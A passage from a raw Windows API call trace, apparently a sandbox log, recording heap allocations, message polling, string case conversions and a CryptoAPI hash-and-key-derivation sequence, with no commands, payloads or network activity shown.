hHeap=0x25c0000) returned 1 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0189.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.059] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0189.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0189.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0189.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0189.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0189.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0189.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0189.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0189.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.061] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0189.061] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0189.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.061] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0189.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0189.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.062] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0189.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0189.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0189.062] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.062] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0189.062] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0189.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0189.063] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0189.063] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.063] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.063] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0189.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.064] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.064] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.064] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.064] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.065] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.065] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.065] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0189.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.065] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.066] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.066] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.066] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.066] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0189.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.066] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0189.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.066] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.067] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0189.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.067] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0189.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.067] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.067] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.067] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.067] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.067] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.067] CryptHashData (hHash=0xaa58a0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0189.068] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.068] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.068] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.068] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.068] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.068] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.068] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.068] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.068] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0189.068] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.068] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0189.068] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.068] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.068] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0189.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0189.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0189.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.070] RtlAllocateHeap 